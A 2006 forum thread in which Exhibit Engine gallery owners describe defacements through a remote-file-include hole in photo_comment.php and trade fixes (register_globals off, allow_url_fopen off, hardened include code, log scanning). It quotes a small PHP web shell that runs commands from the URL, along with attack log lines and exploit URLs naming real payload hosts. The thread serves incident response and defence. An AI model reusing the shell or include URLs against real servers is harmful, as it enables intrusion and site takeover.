Defaced Exhibit Engin


jimmiec
4th of June 2006 (Sun), 16:47
This morning my EE site was defaced. Seems a few files were changed in the public_html\gallery directory. How can I prevent this from happening again???

Please and Thank you
Jimmie

MikeCaine
4th of June 2006 (Sun), 17:47
I noticed people were searching for

Gallery pages created by Exhibit Engine 1.5 RC 4

Presumably there's some hack or insecurity they've found.

I never feel happy with these "powered by" type of text as it's easy to find sites running them if there's any hack doing the rounds.

EricKonieczny
4th of June 2006 (Sun), 17:53
My site has not been Defaced but I just took a look at my Web Stats and Searches and noticed that I had two hits on

exhibit engine 1.5 rc 4


so there is someone out there trying to cause damage.

I have also been the subject of major spamming of My Feedback section again,

What is the fix for the SPAM?

MikeCaine
4th of June 2006 (Sun), 17:54
building_blocks.php in the /indexstyles directory contains the "created by exhibition engine" text that they're searching for.

I've removed it from mine for the time being, although it has been searched for three times already today according to my logs

Edit - Google will have it cached as well :-(

I'm away for a couple of days tomorrow, hoped I don't come back to a defaced / hacked site :-(

jimmiec
4th of June 2006 (Sun), 18:35
I have tried here to attach a file titled shell.php.txt. Remove the .txt to view the php code. I think this is the code that was run on my site???? Any insight. Thanks
Jimmie
Edit
P.S. I guess the attachment didn't work...how can I submit this code?

jimmiec
4th of June 2006 (Sun), 18:52
building_blocks.php in the /indexstyles directory contains the "created by exhibition engine" text that they're searching for.

I've removed it from mine for the time being, although it has been searched for three times already today according to my logs

Edit - Google will have it cached as well :-(

I'm away for a couple of days tomorrow, hoped I don't come back to a defaced / hacked site :-(

I tried to edit it but it displays a fatal error. What's the proper way to edit this out for awhile?? Thanks
Jimmie

segal3
4th of June 2006 (Sun), 20:37
My site got searched on today from IP 213.54.78.132 out of Nordrhein-westfalen, Bochum, Germany.

MikeCaine
5th of June 2006 (Mon), 02:12
I tried to edit it but it displays a fatal error. What's the proper way to edit this out for awhile?? Thanks
Jimmie

I didn't remove the code block, just the single line re exhibition engine

I just found some hacker stuff in a hidden (.dat) folder in my photos directory plus one called irclordz

I turned exhibition engine off when I went to bed last night so I'm not too sure when it happened. I'm on a plane soon so I might just rename the whole ee directory to something else until I come back and can look to getting it sorted

MikeCaine
5th of June 2006 (Mon), 02:21
I can't delete or rename their files. Damn! I've got to go now, hope too much damage isn't done by the time I get back

PeterTaylor
5th of June 2006 (Mon), 03:46
My site has also been hacked. Like a few of the other members I have also had a spate of the feedback being spammed with offers for drugs.

I have checked my web stats and have found the following search terms used,
created by exhibit engine 1.5 rc 4
gallery pages created by exhibit engine
inurl list.php?exhibition= site .uk

Just need to sort the problem out now.

MMCM
5th of June 2006 (Mon), 05:25
I can find log entries from 213.54.78.132 too :-(
213.54.78.132 - - [04/Jun/2006:16:44:01 +0200] "GET /gallery/photo_comment.php?toroot=http://wplayground.wp.ohost.de/sinc.txt?&cmd=ls HTTP/1.1" 200 1123 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

I'm currently checking, if there's some damage...

I also checked the IP with whois, it belongs to TISCALI Germany.
We all should write a hacking report to team@abuse.tiscali.de with a full log report of all accesses from that IP. ASAP!! I hope they immediately cancel the contract of their customer.

Regards from Vienna/Austria
Martin

P.S. Contents of sinc.txt
<?php
echo "<textarea cols=\"100%\" rows=\"100%\">\n";
if($_POST["vcheck"] == "on") echo "vcheck ok";
else passthru($_GET["cmd"]);
echo "</textarea>\n";
?>

MMCM
5th of June 2006 (Mon), 05:47
To prevent further hacking, delete the file "gallery/photo_comment.php", until there's a fix for that file!

My hacking report is already sent to TISCALI.

jimmiec
5th of June 2006 (Mon), 06:46
Here are some files I found in the Gallery Directory hacked or added:
shell.php
Index.html
Index.php
bondevik.txt
inport.html (with an "n")
inport.html.html
photo_comment.php
header.php

Is this against EE or LunarPages? My ISP is LunarPages and I've seen another comment here.

Jimmie

MMCM
5th of June 2006 (Mon), 06:49
I searched my log for other entries with photo_comment.php and found several entries from different IPs :-(

Found some new files in /tmp on the server...
netstat shows some unknown listening connection...
I'm afraid, there will be a lot of work to do :-(
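The search MMCM describes (every request to photo_comment.php, and by the next post every other EE script that builds an include path from $toroot) can be done in a few lines of PHP. The following is an added example, not code from the thread or from Exhibit Engine: it reads Apache combined-format access log lines, decodes the query string, and flags any request whose toroot or lang parameter is a URL, then groups the hits by source IP in the form an abuse desk wants. A plain grep for "toroot=http" misses the percent-encoded variant (toroot=http%3A%2F%2F...) that appears later in this thread, which is why the query is decoded first. The log lines are constructed to mirror the ones quoted in the thread; the addresses other than the one already named here are RFC 5737 documentation addresses, and the ftp:// host is a reserved example name. Written for PHP 7.1 or later.

```php
<?php
// Added example: find remote-file-include attempts against Exhibit Engine
// in an Apache "combined" access log. Not part of EE or of the forum thread.

// CONSTRUCTED sample log, modelled on the lines quoted in the thread.
const SAMPLE_LOG = [
    '213.54.78.132 - - [04/Jun/2006:16:44:01 +0200] "GET /gallery/photo_comment.php?toroot=http://wplayground.wp.ohost.de/sinc.txt?&cmd=ls HTTP/1.1" 200 1123 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Jun/2006:08:00:39 -0400] "GET /photodbase/photo_comment.php?toroot=http%3A%2F%2Fubayin.com%2F_vti_txt%2Fi.x%3F&cmd=deldir&&s=r& HTTP/1.1" 200 5101 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [14/Jun/2006:08:01:02 -0400] "GET /photodbase/indexstyles/groupindex.php?lang=ftp://evil.example/i.txt? HTTP/1.1" 200 802 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [05/Jun/2006:04:49:29 -0700] "GET /gallery/photo.php?photo=595&u=171%7C52%7C HTTP/1.1" 200 3503 "-" "Mozilla/5.0 (compatible; crawler)"',
];

// Parameters EE concatenates into an include path: toroot as prefix, lang as a component.
const RFI_PARAMS = ['toroot', 'lang'];

function ee_rfi_hits(array $lines): array
{
    $hits = [];
    // host ident user [time] "METHOD target HTTP/x.y" status ...
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) HTTP\/[\d.]+" (\d{3})/';
    foreach ($lines as $line) {
        if (!preg_match($re, $line, $m)) {
            continue;                                   // not a combined-format line
        }
        $ip = $m[1]; $time = $m[2]; $target = $m[4]; $status = (int)$m[5];
        $q = strpos($target, '?');
        if ($q === false) {
            continue;                                   // no query string, nothing injected
        }
        parse_str(substr($target, $q + 1), $params);    // parse_str() percent-decodes values
        foreach (RFI_PARAMS as $p) {
            $v = $params[$p] ?? '';
            if (is_string($v) && preg_match('#^(https?|ftp)://#i', $v)) {
                $hits[] = [
                    'ip'     => $ip,
                    'time'   => $time,
                    'script' => substr($target, 0, $q),
                    'param'  => $p,
                    'url'    => $v,
                    'cmd'    => isset($params['cmd']) && is_string($params['cmd']) ? $params['cmd'] : null,
                    'status' => $status,
                ];
            }
        }
    }
    return $hits;
}

// One block per source IP: what was requested, when, and the status code.
// For this bug a 200 means the remote file was fetched and executed.
function ee_rfi_report(array $hits): string
{
    $byIp = [];
    foreach ($hits as $h) {
        $byIp[$h['ip']][] = $h;
    }
    $out = '';
    foreach ($byIp as $ip => $list) {
        $out .= $ip . ' (' . count($list) . " attempt(s))\n";
        foreach ($list as $h) {
            $out .= sprintf("  %s %s %s=%s cmd=%s status=%d\n",
                $h['time'], $h['script'], $h['param'], $h['url'], $h['cmd'] ?? '-', $h['status']);
        }
    }
    return $out;
}

echo ee_rfi_report(ee_rfi_hits(SAMPLE_LOG));
```

To run it over a real log, replace SAMPLE_LOG with file('access_log', FILE_IGNORE_NEW_LINES). The crawler line is deliberately included and is not reported: a request to photo.php with only numeric parameters is normal traffic, and the host notices quoted later in the thread mix such lines in with the real hits.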

MMCM
5th of June 2006 (Mon), 07:02
After reading http://www.photography-on-the.net/forum/showthread.php?t=177618

On further inspection it appears that this impacts many files in eE (I count 17 PHP files affected by this one variable left uninitialized). Simply plugging photo_comment.php just plugs one of the holes.

I think it's best to disable EE completely :-(

cferrero
5th of June 2006 (Mon), 07:10
I can find log entries from 213.54.78.132 too :-(
213.54.78.132 - - [04/Jun/2006:16:44:01 +0200] "GET /gallery/photo_comment.php?toroot=http://wplayground.wp.ohost.de/sinc.txt?&cmd=ls HTTP/1.1" 200 1123 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

My very basic understanding of these things suggests that this is an attempt to gain root access by exploiting a flaw in the photo comments php script. Have a look at the file sinc.txt to see what it's trying to do. I think the key is the line

passthru($_GET["cmd"])

PeterTaylor
5th of June 2006 (Mon), 07:22
Hi

I had p213.54.78.132.tisdip.tiscali.de at 04 Jun 2006 - 15:54

as well

cferrero
5th of June 2006 (Mon), 07:24
I think the best thing to do for the time being is just to disable EE.

pukkita
5th of June 2006 (Mon), 08:38
FIX:

To prevent this exploit from working, simply add this to your php.ini:

allow_url_fopen = off

The location of your php.ini will differ from ISP to ISP, on some you may have to include it on a .htaccess file.

To check for the actual configuration, create a page, say info.php, with this code:

<?php
phpinfo();
?>

Call it from your web browser (i.e. http://www.yoursite.com/info.php) and check that variable.

be sure to DELETE info.php afterwards, you will be giving too much information to hackers if you leave it.

EE will still work fine with allow_url_fopen = off (I had always had php this way) but all vulnerable php functions (include, include_once, etc) on any EE page will refuse to open external files, which is half the problem here.

I'm sure Pekka started using the include, include_once functions using PHP versions prior to PHP 4.3 (where external files weren't supported) that would explain the lack of escaping and code injection checks in EE.

Having allow_url_fopen enabled without a sound reason is a call for trouble anyway.
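A phpinfo() page reveals far more than the one setting being checked. The script below is an added example, not from the thread or from Exhibit Engine: it reports only the directives that matter for this exploit and nothing else, and it is version-aware, because on PHP 5.2 and later remote include() is gated by allow_url_include rather than allow_url_fopen, and register_globals was removed outright in PHP 5.4 (ini_get() then returns false and the check is skipped). It still has to be uploaded under a throwaway name, opened once and deleted, exactly as with info.php. Function names are hypothetical; written for PHP 7.1 or later.

```php
<?php
// Added example: report the php.ini settings relevant to the toroot= include
// exploit without exposing a full phpinfo(). Not part of EE or of the thread.
header('Content-Type: text/plain');

// true/false for a boolean directive, null when this PHP build does not know it.
function ee_ini_on(string $name): ?bool
{
    $raw = ini_get($name);
    if ($raw === false) {
        return null;
    }
    return in_array(strtolower(trim((string)$raw)), ['1', 'on', 'yes', 'true'], true);
}

function ee_config_problems(): array
{
    // name => [is it relevant on this PHP version, why it must be off]
    $checks = [
        'register_globals'  => [true, 'request parameters silently become $toroot and $lang'],
        'allow_url_include' => [true, 'include()/require() will fetch http:// and ftp:// paths (PHP 5.2+)'],
        // Before 5.2 there was no allow_url_include; allow_url_fopen alone enabled remote include().
        'allow_url_fopen'   => [version_compare(PHP_VERSION, '5.2.0', '<'),
                                'on PHP this old, this switch alone lets include() fetch URLs'],
    ];
    $problems = [];
    foreach ($checks as $name => [$relevant, $why]) {
        if ($relevant && ee_ini_on($name) === true) {
            $problems[$name] = $why;
        }
    }
    return $problems;
}

$problems = ee_config_problems();
echo 'PHP ', PHP_VERSION, "\n";
if ($problems === []) {
    echo "OK: register_globals and remote include() are off\n";
} else {
    foreach ($problems as $name => $why) {
        echo "UNSAFE: $name is on: $why\n";
    }
}
```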

jimmiec
5th of June 2006 (Mon), 10:24
Well they suspended me too. Here's their message. Although this looks OK to me. Anyone?

Your account has been exploited:


Mon Jun 5 04:35:00 2006 user jimmiec2 pid 18284 what ./bind
Mon Jun 5 04:45:01 2006 user jimmiec2 pid 18588 what ./bind
Mon Jun 5 04:50:00 2006 user jimmiec2 pid 18284 what ./bind
Mon Jun 5 04:50:00 2006 user jimmiec2 pid 18588 what ./bind

[05/Jun/2006:04:49:27 -0700] "GET /gallery/list.php?exhibition=5&u=15%7C5%7C... HTTP/1.1" 200 5813
66.249.65.43 - - [05/Jun/2006:04:49:29 -0700] "GET /gallery/photo.php?photo=595&u=171%7C52%7C... HTTP/1.1" 200 3503 "-"
66.249.65.43 - - [05/Jun/2006:04:49:32 -0700] "GET /gallery/photo.php?photo=680&u=171%7C47%7C... HTTP/1.1" 200 3486 "-"
66.249.65.43 - - [05/Jun/2006:04:49:33 -0700] "GET /gallery/photo.php?photo=784&u=2198%7C29%7C... HTTP/1.1" 200 3528 "-"
66.249.65.43 - - [05/Jun/2006:04:49:34 -0700] "GET /gallery/photo.php?photo=503&exhibition=22&u=1421%7C14%7C... HTTP/1.1" 200 3504
66.249.65.43 - - [05/Jun/2006:04:49:35 -0700]


Jimmie

PeterTaylor
5th of June 2006 (Mon), 12:15
My Web host sent me this information today.
----
Quite a spectacular security hole. The file photo_comment.php, and quite a few other files, contain something like this:

"
$getlang = $toroot . "languages/" . $lang . "/comment.php";
include_once($getlang);
"

By using a URL like this:

http://www.mydomain.com/photo_comment.php?toroot=http://www.geocities.com/chireobox/gnomex.html?

The script would include the file at:

http://www.geocities.com/chireobox/gnomex.html?languages/english/comment.php

Then run it. This allows a hacker to run whatever code they like on the
web server.
----

Peter

HMetal
5th of June 2006 (Mon), 13:07
I think it's best to disable EE completely :-(

Well, I patched the obvious hole (the one where hackers are using the "toroot=blah" exploit) in mine and my eE has not been exploited.

However, I'm VERY curious as to what other global variables are not properly initialized in eE. The easiest way to prevent this is to set global variables to some initial value in the script so that hackers can't use GET or POST injection. What I would do, if I were Pekka, is include some "sanitizer.php" file in every browser accessible script. This sanitizer.php file would initialize the globals and sanitize any user submitted data.

The second thing I would do if I were Pekka is to move php scripts, that the browser never accesses, to a sub-directory and then just deny all browser access to that directory (using an .htaccess "deny from all" directive). That's just the start of making eE more secure.

This whole eE exploit thing just doesn't sound good. Let's hope Pekka can become more security conscious about these things. Being a PHP veteran and a corporate web developer, I know the pitfalls. I'm willing to help Pekka if he needs the help.
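The pattern PeterTaylor's host quoted, and the kind of fix HMetal describes (initialise what used to be globals, validate what the request sent), as an added example written for this page rather than Exhibit Engine's own code. The vulnerable function only builds the string the original code would have passed to include_once(); it never includes it. The hardened version fixes the root inside the script, restricts the language name to letters, and then checks with realpath() that the resolved file really lies under languages/, so neither a URL nor a ../ sequence can reach anything else. The function names, the demo fixture and the temporary directory are hypothetical; the languages/<lang>/comment.php layout is the one quoted in the thread. Written for PHP 7 or later.

```php
<?php
// Added example, not Exhibit Engine code: the include pattern quoted in the
// thread next to a hardened replacement.

// VULNERABLE (shape quoted by PeterTaylor's host). With register_globals=on,
// $toroot and $lang arrive from the query string uninitialised, so
//   photo_comment.php?toroot=http://attacker.example/sinc.txt?
// produces "http://attacker.example/sinc.txt?languages/english/comment.php",
// which include_once() fetches and runs (allow_url_fopen on PHP < 5.2,
// allow_url_include on 5.2+). Kept here only to show the string; never include it.
function vulnerable_lang_file($toroot, $lang)
{
    return $toroot . "languages/" . $lang . "/comment.php";
}

// HARDENED: the script owns the root, and $lang must name a directory that
// really exists below languages/. realpath() resolves symlinks and "..", so the
// prefix test cannot be fooled by traversal.
function safe_lang_file(string $lang, string $root): ?string
{
    if (!preg_match('/^[a-z]{2,16}$/', $lang)) {
        return null;                      // no "/", ".", ":" -> no URLs, no traversal
    }
    $langDir = realpath($root . '/languages');
    if ($langDir === false) {
        return null;                      // installation broken; fail closed
    }
    $file   = realpath($langDir . '/' . $lang . '/comment.php');
    $prefix = $langDir . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;                      // not installed, or escaped languages/
    }
    return $file;
}

// How a page would use it: a fixed root, a validated request value with a
// default, and a hard failure rather than a silent include of something else.
function load_language(string $root, array $request): string
{
    $toroot = $root;                                      // never taken from the request
    $lang   = isset($request['lang']) ? (string)$request['lang'] : 'english';
    $file   = safe_lang_file($lang, $toroot) ?? safe_lang_file('english', $toroot);
    if ($file === null) {
        http_response_code(500);
        exit('language files missing');
    }
    include_once $file;
    return $file;
}

// CONSTRUCTED fixture so the example runs stand-alone: a temporary EE-like tree.
function demo(): array
{
    $root = sys_get_temp_dir() . '/ee_demo_' . getmypid();
    mkdir($root . '/languages/english', 0700, true);
    file_put_contents($root . '/languages/english/comment.php', "<?php\n// constructed language file\n");

    $out = [];
    foreach (['english', 'klingon', '../../../etc/passwd', 'http://attacker.example/sinc.txt?'] as $probe) {
        $out[$probe] = safe_lang_file($probe, $root) === null ? 'rejected' : 'ok';
    }
    $out['request lang=http://...'] = basename(load_language($root, ['lang' => 'http://attacker.example/x?']));
    $out['vulnerable string']       = vulnerable_lang_file('http://attacker.example/sinc.txt?', 'english');

    unlink($root . '/languages/english/comment.php');
    rmdir($root . '/languages/english');
    rmdir($root . '/languages');
    rmdir($root);
    return $out;
}

print_r(demo());
```

Only 'english' is accepted; the hostile request falls back to the English file instead of fetching a URL. Note that the realpath() prefix test is defence in depth: the letters-only regex already rejects every probe except the installed name, which is what HMetal's "sanitizer" idea amounts to in practice.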

yakman
5th of June 2006 (Mon), 13:12
My service provider has just sent me an email reporting that both photo_comment.php and /indexstyles/groupindex.php have been abused and the result has been a phishing site installed on my server

.recover/signin.ebay.com/ws/eBayISAPI.dl/login/client4844AD7451/eBayISAPI.htm

I'm not sure what to do about this, but want to make all aware.

Pekka
5th of June 2006 (Mon), 14:54
I just came back from Norway, so I'm late with comments.

If $toroot or $lang or any variable can be changed from URL, it means in php.ini register_globals = on
I have said it many times, set it off: http://photography-on-the.net/forum/showthread.php?t=59135&highlight=register_globals
In this sense I do not feel that the problem is an EE problem; it is a PHP configuration problem and affects all installed PHP applications on your server. But of course all should be done to avoid exploits even on systems with globals off.

More soon.

yakman
5th of June 2006 (Mon), 14:54
Well, I patched the obvious hole (the one where hackers are using using the "toroot=blah" exploit) in mine and my eE has not been exploited.


Sorry if I'm being stupid here, how exactly did you carry out the patch?

tommykjensen
5th of June 2006 (Mon), 15:05
I just came back from Norway, so I'm late with comments.

If $toroot or $lang or any variable can be changed from URL, it means in php.ini register_globals = on
I have said it many times, set it off: http://photography-on-the.net/forum/showthread.php?t=59135&highlight=register_globals


Can this be done without having access to php.ini?

Pekka
5th of June 2006 (Mon), 15:15
Can this be done without having access to php.ini?

.htaccess with

php_flag register_globals off

should do it.

or

php_flag register_globals 0

On Apache 2 this will not work. It has to be put by your host in the VirtualHost handler for your website in httpd.conf.
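The two PHP-level switches discussed in this thread, as one .htaccess file for the gallery directory (where index.php lives). This is an added example, not a file from the thread or from Exhibit Engine, and it assumes a host running PHP as an Apache module with AllowOverride Options (or All) for the directory; where PHP runs as CGI/FastCGI, php_flag is not a recognised Apache directive and the whole site answers with a 500, and the same settings then belong in php.ini (register_globals = Off, allow_url_fopen = Off) or in the VirtualHost block, as Pekka says. The first line stops the query string from populating $toroot and $lang; the second stops include() from fetching remote code even if something else does.

```apache
# .htaccess for the EE gallery directory (added example, not from the thread)
# Requires mod_php and AllowOverride Options/All for this directory.
php_flag register_globals off
php_flag allow_url_fopen off
# On PHP 5.2 and later remote include() has its own switch, off by default:
#   php_flag allow_url_include off
```

After uploading it, request any gallery page once: a 500 means the host does not allow these directives here and the php.ini route is the one to take.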

tommykjensen
5th of June 2006 (Mon), 15:43
Thanks. Works.

jimmiec
5th of June 2006 (Mon), 20:55
My Web host sent me this information today.
----
Quite a spectacular security hole. The file photo_comment.php, and quite a few other files, contain something like this:

I deleted the photo_comment.php early in the game. Where does it live so I can put a good copy back?

Thanks
Jimmie

GuiBou
14th of June 2006 (Wed), 07:57
I think I had the same problem since 6/6/6 (hell yeah). I just found out the entire web site has been hacked too.

So where do I put the .htaccess file exactly ? What content in it ?

Thanks !

GuiBou (not so used to messing with that :) )

Pekka
14th of June 2006 (Wed), 08:29
I think I had the same problem since 6/6/6 (hell yeah). I just found out the entire web site has been hacked too.

So where do I put the .htaccess file exactly ? What content in it ?

Thanks !

GuiBou (not so used to messing with that :) )

Just one line:

php_flag register_globals 0

and put it in your gallery folder (where index.php is). Then do the test procedure again as instructed in http://photography-on-the.net/forum/showthread.php?t=177875

PrimaPhoto
15th of June 2006 (Thu), 16:44
I just got hacked on June 12 thru the photo_comment.php file. My hosting company had shut me down for a day and now still monitoring the situation.

Has anyone heard of this?
I just downloaded my log files and found the details to the attack.

This is an example:
internal--router.canaca.com - - [14/Jun/2006:08:00:39 -0400] "GET /photodbase/photo_comment.php?toroot=http%3A%2F%2Fubayin.com%2F_vti_txt%2Fi.x%3F&cmd=deldir&&s=r& HTTP/1.1" 200 5101 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4"

Any ways of stopping?

Pekka
15th of June 2006 (Thu), 18:11
Fix is in http://photography-on-the.net/forum/showthread.php?t=177875. You will need to clean all unknown files and temp dirs.

PrimaPhoto
15th of June 2006 (Thu), 19:59
Thank you Pekka for the info I did the test.php file and it is ok.
There are many files in my temp directory and going thru my admin panel for my site I cannot delete the files, so I will pass this info on to my hosting company and maybe they can clean it up.

Should there be anything in this temp directory?
Is there a way that you can get me a list of what to keep and I can pass this along to my hosting company?

Thanks again Pekka and I hope you are enjoying the summer.

PP

jaypie77
26th of June 2006 (Mon), 08:46
I was also hacked recently and they left a message in the code for me. Something like:

"You have been hacked by ____. Sorry admin - don't worry, none of your data was affected. Email ___."

Anyway, sounds like it's similar to what all of you have had experience with. So you know, the hacker did not damage anything other than making a new frontpage. I have also emailed them with a junk account just to chat. I'll let you all know what this is all about when I find out more.

PrimaPhoto
27th of June 2006 (Tue), 13:46
They installed a proxy server in my comments folder. I've been monitoring my log files everyday now and there has been no activity - I think they gave up.

But I would REALLY like to find out about some info - see my post above.

Any news on V 2.0?

MikeCaine
28th of June 2006 (Wed), 05:02
"You have been hacked by ____. Sorry admin - don't worry, none of your data was affected. Email ___."

Anyway, sounds like it's similar to what all of you have had experience with. So you know, the hacker did not damage anything other than making a new frontpage.

Of course, he might be just saying that so you don't go looking for all of the other files that he uploaded to your site.

Do you trust hackers?

jaypie77
3rd of July 2006 (Mon), 22:09
So I actually emailed my hacker and have had some discussion with him/her about what she/he did. Basically, sounds like they found out about this vulnerability and wanted to get some practice/bragging rights with peers. That's not what they actually said, of course. Anyway, I think most hackers are ultimately harmless tinkerers, but I will be glad to be rid of them.

christopherpm
15th of October 2006 (Sun), 05:33
Well it was my turn today! I didn't know there was an exploit in EE until today! My host suspended my page (but of course they sent an email to the suspended account which I couldn't read!!!)

I changed the password on my account (using WHM on my reseller account), and it turns out that somehow or other, 5 extra accounts attached to my account have appeared in the vhosts file. When I changed the password for my domain, I got the following message:-

Ftp Updating...

Main >> Account Functions >> Password Modification

Updating ftp passwords for all users
Warning: Unable to determine satprep's main domain. Skipping vhosts
password update for this user.
Warning: Unable to determine mdc1956's main domain. Skipping vhosts
password update for this user.
Warning: Unable to determine secret's main domain. Skipping vhosts
password update for this user.
Warning: Unable to determine xplicit1's main domain. Skipping vhosts
password update for this user.
Warning: Unable to determine poonan's main domain. Skipping vhosts
password update for this user.
Ftp password files updated.
Ftp vhost passwords synced


So I don't know if these accounts still exist or not!!! If I delete EE or install the 1.5_SECURE package, will they still be able to gain access using those usernames?